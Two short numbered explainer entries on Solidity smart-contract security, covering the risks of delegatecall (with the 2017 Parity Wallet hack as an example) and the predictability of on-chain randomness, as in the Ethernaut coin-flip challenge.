183: Delegatecall

 Delegatecall is a powerful low level operation in Solidity. A contract can use delegatecall to run code from another external contract while preserving the caller's context. This is extremely powerful and allows for things like upgradeable smart contracts. However, extreme caution is required since delegatecall has been the vector for numerous high profile hacks in Ethereum. The executing contract has the ability to manipulate the calling contract's state. It would be extremely unwise to use delegatecall as a catchall forwarding system in your contract. This is what allowed the attacker in the Parity Wallet hack of 2017 to overwrite the owner wallets with his own wallet address and withdraw all funds. 

182: On Chain Randomness

 Blockchains are designed to be deterministic, with all interactions viewable and traceable. How then can we access randomness to use in our contracts? One might think we can query some value that isn't random but can be hard to predict, like the block number, and process it with some algorithm to get our desired random number. This may seem clever, but an attacker can make his own smart contract that uses the same methods to predict your random value in advance. This is the vulnerability found in Open Zeppelin's Ethernaut 3 challenge, where a coin flip game determines the result based on the block number. This contract can be exploited by a second contract calculates whether the coin will land heads or tails using the same exact math, and then guesses correctly every time. This simple contract illustrates the challenges of consuming random data on-chain. Various solutions exist, such as Chainlink's Verifiable Randomness call that can inject random data into your contract from an oracle.